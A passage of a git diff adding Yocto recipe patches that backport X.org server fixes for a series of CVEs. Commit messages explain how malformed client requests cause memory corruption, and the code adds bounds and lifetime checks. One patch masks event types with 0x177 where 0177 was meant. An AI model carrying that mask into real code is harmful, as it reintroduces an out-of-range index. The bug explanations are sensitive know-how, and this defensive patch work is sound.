+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch
@@ -0,0 +1,40 @@
+From d2dcbdc67c96c84dff301505072b0b7b022f1a14 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Sun, 4 Dec 2022 17:40:21 +0000
+Subject: [PATCH 1/3] xkb: proof GetCountedString against request length
+ attacks
+
+GetCountedString did a check for the whole string to be within the
+request buffer but not for the initial 2 bytes that contain the length
+field. A swapped client could send a malformed request to trigger a
+swaps() on those bytes, writing into random memory.
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Ustream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=11beef0b7f1ed290348e45618e5fa0d2bffcb72e]
+CVE: CVE-2022-3550
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+
+---
+ xkb/xkb.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/xkb/xkb.c b/xkb/xkb.c
+index 68c59df..bf8aaa3 100644
+--- a/xkb/xkb.c
++++ b/xkb/xkb.c
+@@ -5138,6 +5138,11 @@ _GetCountedString(char **wire_inout, ClientPtr client, char **str)
+     CARD16 len;
+ 
+     wire = *wire_inout;
++
++    if (client->req_len <
++        bytes_to_int32(wire + 2 - (char *) client->requestBuffer))
++	return BadValue;
++
+     len = *(CARD16 *) wire;
+     if (client->swapped) {
+         swaps(&len);
+-- 
+2.17.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch
new file mode 100644
index 0000000000..a3b977aac9
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch
@@ -0,0 +1,64 @@
+From d3787290f56165f5656ddd2123dbf676a32d0a68 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Sun, 4 Dec 2022 17:44:00 +0000
+Subject: [PATCH 2/3] xkb: fix some possible memleaks in XkbGetKbdByName
+
+GetComponentByName returns an allocated string, so let's free that if we
+fail somewhere.
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=18f91b950e22c2a342a4fbc55e9ddf7534a707d2]
+CVE: CVE-2022-3551
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+
+---
+ xkb/xkb.c | 26 +++++++++++++++++++-------
+ 1 file changed, 19 insertions(+), 7 deletions(-)
+
+diff --git a/xkb/xkb.c b/xkb/xkb.c
+index bf8aaa3..f79d306 100644
+--- a/xkb/xkb.c
++++ b/xkb/xkb.c
+@@ -5908,19 +5908,31 @@ ProcXkbGetKbdByName(ClientPtr client)
+     xkb = dev->key->xkbInfo->desc;
+     status = Success;
+     str = (unsigned char *) &stuff[1];
+-    if (GetComponentSpec(&str, TRUE, &status))  /* keymap, unsupported */
+-        return BadMatch;
++    {
++        char *keymap = GetComponentSpec(&str, TRUE, &status);  /* keymap, unsupported */
++        if (keymap) {
++            free(keymap);
++            return BadMatch;
++        }
++    }
+     names.keycodes = GetComponentSpec(&str, TRUE, &status);
+     names.types = GetComponentSpec(&str, TRUE, &status);
+     names.compat = GetComponentSpec(&str, TRUE, &status);
+     names.symbols = GetComponentSpec(&str, TRUE, &status);
+     names.geometry = GetComponentSpec(&str, TRUE, &status);
+-    if (status != Success)
+-        return status;
+-    len = str - ((unsigned char *) stuff);
+-    if ((XkbPaddedSize(len) / 4) != stuff->length)
+-        return BadLength;
++    if (status == Success) {
++        len = str - ((unsigned char *) stuff);
++        if ((XkbPaddedSize(len) / 4) != stuff->length)
++            status = BadLength;
++    }
+ 
++    if (status != Success) {
++        free(names.keycodes);
++        free(names.types);
++        free(names.compat);
++        free(names.symbols);
++        free(names.geometry);
++    }
+     CHK_MASK_LEGAL(0x01, stuff->want, XkbGBN_AllComponentsMask);
+     CHK_MASK_LEGAL(0x02, stuff->need, XkbGBN_AllComponentsMask);
+ 
+-- 
+2.17.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch
new file mode 100644
index 0000000000..94cea77edc
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch
@@ -0,0 +1,49 @@
+From 57ad2c03730d56f8432b6d66b29c0e5a9f9b1ec2 Mon Sep 17 00:00:00 2001
+From: Jeremy Huddleston Sequoia <jeremyhu@apple.com>
+Date: Sun, 4 Dec 2022 17:46:18 +0000
+Subject: [PATCH 3/3] xquartz: Fix a possible crash when editing the
+ Application menu due to mutaing immutable arrays
+
+Crashing on exception: -[__NSCFArray replaceObjectAtIndex:withObject:]: mutating method sent to immutable object
+
+Application Specific Backtrace 0:
+0   CoreFoundation                      0x00007ff80d2c5e9b __exceptionPreprocess + 242
+1   libobjc.A.dylib                     0x00007ff80d027e48 objc_exception_throw + 48
+2   CoreFoundation                      0x00007ff80d38167b _CFThrowFormattedException + 194
+3   CoreFoundation                      0x00007ff80d382a25 -[__NSCFArray removeObjectAtIndex:].cold.1 + 0
+4   CoreFoundation                      0x00007ff80d2e6c0b -[__NSCFArray replaceObjectAtIndex:withObject:] + 119
+5   X11.bin                             0x00000001003180f9 -[X11Controller tableView:setObjectValue:forTableColumn:row:] + 169
+
+Fixes: https://github.com/XQuartz/XQuartz/issues/267
+Signed-off-by: Jeremy Huddleston Sequoia <jeremyhu@apple.com>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=dfd057996b26420309c324ec844a5ba6dd07eda3]
+CVE: CVE-2022-3553
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+
+---
+ hw/xquartz/X11Controller.m | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/hw/xquartz/X11Controller.m b/hw/xquartz/X11Controller.m
+index 3efda50..9870ff2 100644
+--- a/hw/xquartz/X11Controller.m
++++ b/hw/xquartz/X11Controller.m
+@@ -467,8 +467,12 @@ extern char *bundle_id_prefix;
+     self.table_apps = table_apps;
+ 
+     NSArray * const apps = self.apps;
+-    if (apps != nil)
+-        [table_apps addObjectsFromArray:apps];
++
++    if (apps != nil) {
++        for (NSArray <NSString *> * row in apps) {
++            [table_apps addObject:row.mutableCopy];
++        }
++    }
+ 
+     columns = [apps_table tableColumns];
+     [[columns objectAtIndex:0] setIdentifier:@"0"];
+-- 
+2.17.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch
new file mode 100644
index 0000000000..3f6b68fea8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch
@@ -0,0 +1,39 @@
+From ccdd431cd8f1cabae9d744f0514b6533c438908c Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 5 Dec 2022 15:55:54 +1000
+Subject: [PATCH] xkb: reset the radio_groups pointer to NULL after freeing it
+
+Unlike other elements of the keymap, this pointer was freed but not
+reset. On a subsequent XkbGetKbdByName request, the server may access
+already freed memory.
+
+CVE-2022-4283, ZDI-CAN-19530
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/ccdd431cd8f1cabae9d744f0514b6533c438908c]
+CVE: CVE-2022-4283
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ xkb/xkbUtils.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/xkb/xkbUtils.c b/xkb/xkbUtils.c
+index 8975ade..9bc51fc 100644
+--- a/xkb/xkbUtils.c
++++ b/xkb/xkbUtils.c
+@@ -1327,6 +1327,7 @@ _XkbCopyNames(XkbDescPtr src, XkbDescPtr dst)
+         }
+         else {
+             free(dst->names->radio_groups);
++            dst->names->radio_groups = NULL;
+         }
+         dst->names->num_rg = src->names->num_rg;
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch
new file mode 100644
index 0000000000..a6c97485cd
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch
@@ -0,0 +1,55 @@
+From b320ca0ffe4c0c872eeb3a93d9bde21f765c7c63 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 12:55:45 +1000
+Subject: [PATCH] Xtest: disallow GenericEvents in XTestSwapFakeInput
+
+XTestSwapFakeInput assumes all events in this request are
+sizeof(xEvent) and iterates through these in 32-byte increments.
+However, a GenericEvent may be of arbitrary length longer than 32 bytes,
+so any GenericEvent in this list would result in subsequent events to be
+misparsed.
+
+Additional, the swapped event is written into a stack-allocated struct
+xEvent (size 32 bytes). For any GenericEvent longer than 32 bytes,
+swapping the event may thus smash the stack like an avocado on toast.
+
+Catch this case early and return BadValue for any GenericEvent.
+Which is what would happen in unswapped setups anyway since XTest
+doesn't support GenericEvent.
+
+CVE-2022-46340, ZDI-CAN 19265
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/b320ca0ffe4c0c872eeb3a93d9bde21f765c7c63]
+CVE: CVE-2022-46340
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/xtest.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/Xext/xtest.c b/Xext/xtest.c
+index 38b8012..bf11789 100644
+--- a/Xext/xtest.c
++++ b/Xext/xtest.c
+@@ -501,10 +501,11 @@ XTestSwapFakeInput(ClientPtr client, xReq * req)
+ 
+     nev = ((req->length << 2) - sizeof(xReq)) / sizeof(xEvent);
+     for (ev = (xEvent *) &req[1]; --nev >= 0; ev++) {
++        int evtype = ev->u.u.type & 0x177;
+         /* Swap event */
+-        proc = EventSwapVector[ev->u.u.type & 0177];
++        proc = EventSwapVector[evtype];
+         /* no swapping proc; invalid event type? */
+-        if (!proc || proc == NotImplemented) {
++        if (!proc || proc == NotImplemented || evtype == GenericEvent) {
+             client->errorValue = ev->u.u.type;
+             return BadValue;
+         }
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch
new file mode 100644
index 0000000000..0ef6e5fc9f
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch
@@ -0,0 +1,86 @@
+From 51eb63b0ee1509c6c6b8922b0e4aa037faa6f78b Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 13:55:32 +1000
+Subject: [PATCH] Xi: disallow passive grabs with a detail > 255
+
+The XKB protocol effectively prevents us from ever using keycodes above
+255. For buttons it's theoretically possible but realistically too niche
+to worry about. For all other passive grabs, the detail must be zero
+anyway.
+
+This fixes an OOB write:
+
+ProcXIPassiveUngrabDevice() calls DeletePassiveGrabFromList with a
+temporary grab struct which contains tempGrab->detail.exact = stuff->detail.
+For matching existing grabs, DeleteDetailFromMask is called with the
+stuff->detail value. This function creates a new mask with the one bit
+representing stuff->detail cleared.
+
+However, the array size for the new mask is 8 * sizeof(CARD32) bits,
+thus any detail above 255 results in an OOB array write.
+
+CVE-2022-46341, ZDI-CAN 19381
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/51eb63b0ee1509c6c6b8922b0e4aa037faa6f78b]
+CVE: CVE-2022-46341
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xi/xipassivegrab.c | 22 ++++++++++++++--------
+ 1 file changed, 14 insertions(+), 8 deletions(-)
+
+diff --git a/Xi/xipassivegrab.c b/Xi/xipassivegrab.c
+index d30f51f..89a5910 100644
+--- a/Xi/xipassivegrab.c
++++ b/Xi/xipassivegrab.c
+@@ -133,6 +133,12 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+         return BadValue;
+     }
+ 
++    /* XI2 allows 32-bit keycodes but thanks to XKB we can never
++     * implement this. Just return an error for all keycodes that
++     * cannot work anyway, same for buttons > 255. */
++    if (stuff->detail > 255)
++        return XIAlreadyGrabbed;
++
+     if (XICheckInvalidMaskBits(client, (unsigned char *) &stuff[1],
+                                stuff->mask_len * 4) != Success)
+         return BadValue;
+@@ -203,14 +209,8 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+                                 &param, XI2, &mask);
+             break;
+         case XIGrabtypeKeycode:
+-            /* XI2 allows 32-bit keycodes but thanks to XKB we can never
+-             * implement this. Just return an error for all keycodes that
+-             * cannot work anyway */
+-            if (stuff->detail > 255)
+-                status = XIAlreadyGrabbed;
+-            else
+-                status = GrabKey(client, dev, mod_dev, stuff->detail,
+-                                 &param, XI2, &mask);
++            status = GrabKey(client, dev, mod_dev, stuff->detail,
++                             &param, XI2, &mask);
+             break;
+         case XIGrabtypeEnter:
+         case XIGrabtypeFocusIn:
+@@ -319,6 +319,12 @@ ProcXIPassiveUngrabDevice(ClientPtr client)
+         return BadValue;
+     }
+ 
++    /* We don't allow passive grabs for details > 255 anyway */
++    if (stuff->detail > 255) {
++        client->errorValue = stuff->detail;
++        return BadValue;
++    }
++
+     rc = dixLookupWindow(&win, stuff->grab_window, client, DixSetAttrAccess);
+     if (rc != Success)
+         return rc;
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch
new file mode 100644
index 0000000000..23fef3f321
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch
@@ -0,0 +1,78 @@
+From b79f32b57cc0c1186b2899bce7cf89f7b325161b Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 30 Nov 2022 11:20:40 +1000
+Subject: [PATCH] Xext: free the XvRTVideoNotify when turning off from the same
+ client
+
+This fixes a use-after-free bug:
+
+When a client first calls XvdiSelectVideoNotify() on a drawable with a
+TRUE onoff argument, a struct XvVideoNotifyRec is allocated. This struct
+is added twice to the resources:
+  - as the drawable's XvRTVideoNotifyList. This happens only once per
+    drawable, subsequent calls append to this list.
+  - as the client's XvRTVideoNotify. This happens for every client.
+
+The struct keeps the ClientPtr around once it has been added for a
+client. The idea, presumably, is that if the client disconnects we can remove
+all structs from the drawable's list that match the client (by resetting
+the ClientPtr to NULL), but if the drawable is destroyed we can remove
+and free the whole list.
+
+However, if the same client then calls XvdiSelectVideoNotify() on the
+same drawable with a FALSE onoff argument, only the ClientPtr on the
+existing struct was set to NULL. The struct itself remained in the
+client's resources.
+
+If the drawable is now destroyed, the resource system invokes
+XvdiDestroyVideoNotifyList which frees the whole list for this drawable
+- including our struct. This function however does not free the resource
+for the client since our ClientPtr is NULL.
+
+Later, when the client is destroyed and the resource system invokes
+XvdiDestroyVideoNotify, we unconditionally set the ClientPtr to NULL. On
+a struct that has been freed previously. This is generally frowned upon.
+
+Fix this by calling FreeResource() on the second call instead of merely
+setting the ClientPtr to NULL. This removes the struct from the client
+resources (but not from the list), ensuring that it won't be accessed
+again when the client quits.
+
+Note that the assignment tpn->client = NULL; is superfluous since the
+XvdiDestroyVideoNotify function will do this anyway. But it's left for
+clarity and to match a similar invocation in XvdiSelectPortNotify.
+
+CVE-2022-46342, ZDI-CAN 19400
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/b79f32b57cc0c1186b2899bce7cf89f7b325161b]
+CVE: CVE-2022-46342
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/xvmain.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/Xext/xvmain.c b/Xext/xvmain.c
+index c520c7d..5f4c174 100644
+--- a/Xext/xvmain.c
++++ b/Xext/xvmain.c
+@@ -811,8 +811,10 @@ XvdiSelectVideoNotify(ClientPtr client, DrawablePtr pDraw, BOOL onoff)
+         tpn = pn;
+         while (tpn) {
+             if (tpn->client == client) {
+-                if (!onoff)
++                if (!onoff) {
+                     tpn->client = NULL;
++                    FreeResource(tpn->id, XvRTVideoNotify);
++                }
+                 return Success;
+             }
+             if (!tpn->client)
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch
new file mode 100644
index 0000000000..838f7d3726
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch
@@ -0,0 +1,51 @@
+From 842ca3ccef100ce010d1d8f5f6d6cc1915055900 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 14:53:07 +1000
+Subject: [PATCH] Xext: free the screen saver resource when replacing it
+
+This fixes a use-after-free bug:
+
+When a client first calls ScreenSaverSetAttributes(), a struct
+ScreenSaverAttrRec is allocated and added to the client's
+resources.
+
+When the same client calls ScreenSaverSetAttributes() again, a new
+struct ScreenSaverAttrRec is allocated, replacing the old struct. The
+old struct was freed but not removed from the clients resources.
+
+Later, when the client is destroyed the resource system invokes
+ScreenSaverFreeAttr and attempts to clean up the already freed struct.
+
+Fix this by letting the resource system free the old attrs instead.
+
+CVE-2022-46343, ZDI-CAN 19404
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/842ca3ccef100ce010d1d8f5f6d6cc1915055900]
+CVE: CVE-2022-46343
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/saver.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Xext/saver.c b/Xext/saver.c
+index c23907d..05b9ca3 100644
+--- a/Xext/saver.c
++++ b/Xext/saver.c
+@@ -1051,7 +1051,7 @@ ScreenSaverSetAttributes(ClientPtr client)
+         pVlist++;
+     }
+     if (pPriv->attr)
+-        FreeScreenAttr(pPriv->attr);
++        FreeResource(pPriv->attr->resource, AttrType);
+     pPriv->attr = pAttr;
+     pAttr->resource = FakeClientID(client->index);
+     if (!AddResource(pAttr->resource, AttrType, (void *) pAttr))
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch
new file mode 100644
index 0000000000..e25afa0d16
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch
@@ -0,0 +1,75 @@
+From 8f454b793e1f13c99872c15f0eed1d7f3b823fe8 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 13:26:57 +1000
+Subject: [PATCH] Xi: avoid integer truncation in length check of
+ ProcXIChangeProperty
+
+This fixes an OOB read and the resulting information disclosure.
+
+Length calculation for the request was clipped to a 32-bit integer. With
+the correct stuff->num_items value the expected request size was
+truncated, passing the REQUEST_FIXED_SIZE check.
+
+The server then proceeded with reading at least stuff->num_items bytes
+(depending on stuff->format) from the request and stuffing whatever it
+finds into the property. In the process it would also allocate at least
+stuff->num_items bytes, i.e. 4GB.
+
+The same bug exists in ProcChangeProperty and ProcXChangeDeviceProperty,
+so let's fix that too.
+
+CVE-2022-46344, ZDI-CAN 19405
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/8f454b793e1f13c99872c15f0eed1d7f3b823fe8]
+CVE: CVE-2022-46344
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xi/xiproperty.c | 4 ++--
+ dix/property.c  | 3 ++-
+ 2 files changed, 4 insertions(+), 3 deletions(-)
+
+diff --git a/Xi/xiproperty.c b/Xi/xiproperty.c
+index 6ec419e..0cfa6e3 100644
+--- a/Xi/xiproperty.c
++++ b/Xi/xiproperty.c
+@@ -890,7 +890,7 @@ ProcXChangeDeviceProperty(ClientPtr client)
+     REQUEST(xChangeDevicePropertyReq);
+     DeviceIntPtr dev;
+     unsigned long len;
+-    int totalSize;
++    uint64_t totalSize;
+     int rc;
+ 
+     REQUEST_AT_LEAST_SIZE(xChangeDevicePropertyReq);
+@@ -1128,7 +1128,7 @@ ProcXIChangeProperty(ClientPtr client)
+ {
+     int rc;
+     DeviceIntPtr dev;
+-    int totalSize;
++    uint64_t totalSize;
+     unsigned long len;
+ 
+     REQUEST(xXIChangePropertyReq);
+diff --git a/dix/property.c b/dix/property.c
+index ff1d669..6fdb74a 100644
+--- a/dix/property.c
++++ b/dix/property.c
+@@ -205,7 +205,8 @@ ProcChangeProperty(ClientPtr client)
+     WindowPtr pWin;
+     char format, mode;
+     unsigned long len;
+-    int sizeInBytes, totalSize, err;
++    int sizeInBytes, err;
++    uint64_t totalSize;
+ 
+     REQUEST(xChangePropertyReq);
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch
new file mode 100644
index 0000000000..ef2ee5d55e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch
@@ -0,0 +1,38 @@
+From 0ba6d8c37071131a49790243cdac55392ecf71ec Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 25 Jan 2023 11:41:40 +1000
+Subject: [PATCH] Xi: fix potential use-after-free in DeepCopyPointerClasses
+
+CVE-2023-0494, ZDI-CAN-19596
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/0ba6d8c37071131a49790243cdac55392ecf71ec]
+CVE: CVE-2023-0494
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index 217baa9561..dcd4efb3bc 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -619,8 +619,10 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+             memcpy(to->button->xkb_acts, from->button->xkb_acts,
+                    sizeof(XkbAction));
+         }
+-        else
++        else {
+             free(to->button->xkb_acts);
++            to->button->xkb_acts = NULL;
++        }
+ 
+         memcpy(to->button->labels, from->button->labels,
+                from->button->numButtons * sizeof(Atom));
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch
new file mode 100644
index 0000000000..51d0e0cab6
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch
@@ -0,0 +1,46 @@
+From 26ef545b3502f61ca722a7a3373507e88ef64110 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Mon, 13 Mar 2023 11:08:47 +0100
+Subject: [PATCH] composite: Fix use-after-free of the COW
+
+ZDI-CAN-19866/CVE-2023-1393
+
+If a client explicitly destroys the compositor overlay window (aka COW),
+we would leave a dangling pointer to that window in the CompScreen
+structure, which will trigger a use-after-free later.
+
+Make sure to clear the CompScreen pointer to the COW when the latter gets
+destroyed explicitly by the client.
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Reviewed-by: Adam Jackson <ajax@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/26ef545b3502f61ca722a7a3373507e88ef64110]
+CVE: CVE-2023-1393
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ composite/compwindow.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/composite/compwindow.c b/composite/compwindow.c
+index 4e2494b86b..b30da589e9 100644
+--- a/composite/compwindow.c
++++ b/composite/compwindow.c
+@@ -620,6 +620,11 @@ compDestroyWindow(WindowPtr pWin)
+     ret = (*pScreen->DestroyWindow) (pWin);
+     cs->DestroyWindow = pScreen->DestroyWindow;
+     pScreen->DestroyWindow = compDestroyWindow;
++
++    /* Did we just destroy the overlay window? */
++    if (pWin == cs->pOverlayWin)
++        cs->pOverlayWin = NULL;
++
+ /*    compCheckTree (pWin->drawable.pScreen); can't check -- tree isn't good*/
+     return ret;
+ }
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch
new file mode 100644
index 0000000000..508588481e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch
@@ -0,0 +1,84 @@
+From 541ab2ecd41d4d8689e71855d93e492bc554719a Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 3 Oct 2023 11:53:05 +1000
+Subject: [PATCH] Xi/randr: fix handling of PropModeAppend/Prepend
+
+The handling of appending/prepending properties was incorrect, with at
+least two bugs: the property length was set to the length of the new
+part only, i.e. appending or prepending N elements to a property with P
+existing elements always resulted in the property having N elements
+instead of N + P.
+
+Second, when pre-pending a value to a property, the offset for the old
+values was incorrect, leaving the new property with potentially
+uninitalized values and/or resulting in OOB memory writes.
+For example, prepending a 3 element value to a 5 element property would
+result in this 8 value array:
+  [N, N, N, ?, ?, P, P, P ] P, P
+                            ^OOB write
+
+The XI2 code is a copy/paste of the RandR code, so the bug exists in
+both.
+
+CVE-2023-5367, ZDI-CAN-22153
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/541ab2ecd41d4d8689e71855d93e492bc554719a]
+CVE: CVE-2023-5367
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xiproperty.c    | 4 ++--
+ randr/rrproperty.c | 4 ++--
+ 2 files changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/Xi/xiproperty.c b/Xi/xiproperty.c
+index 066ba21fba..d315f04d0e 100644
+--- a/Xi/xiproperty.c
++++ b/Xi/xiproperty.c
+@@ -730,7 +730,7 @@ XIChangeDeviceProperty(DeviceIntPtr dev, Atom property, Atom type,
+                 XIDestroyDeviceProperty(prop);
+             return BadAlloc;
+         }
+-        new_value.size = len;
++        new_value.size = total_len;
+         new_value.type = type;
+         new_value.format = format;
+ 
+@@ -747,7 +747,7 @@ XIChangeDeviceProperty(DeviceIntPtr dev, Atom property, Atom type,
+         case PropModePrepend:
+             new_data = new_value.data;
+             old_data = (void *) (((char *) new_value.data) +
+-                                  (prop_value->size * size_in_bytes));
++                                  (len * size_in_bytes));
+             break;
+         }
+         if (new_data)
+diff --git a/randr/rrproperty.c b/randr/rrproperty.c
+index c2fb9585c6..25469f57b2 100644
+--- a/randr/rrproperty.c
++++ b/randr/rrproperty.c
+@@ -209,7 +209,7 @@ RRChangeOutputProperty(RROutputPtr output, Atom property, Atom type,
+                 RRDestroyOutputProperty(prop);
+             return BadAlloc;
+         }
+-        new_value.size = len;
++        new_value.size = total_len;
+         new_value.type = type;
+         new_value.format = format;
+ 
+@@ -226,7 +226,7 @@ RRChangeOutputProperty(RROutputPtr output, Atom property, Atom type,
+         case PropModePrepend:
+             new_data = new_value.data;
+             old_data = (void *) (((char *) new_value.data) +
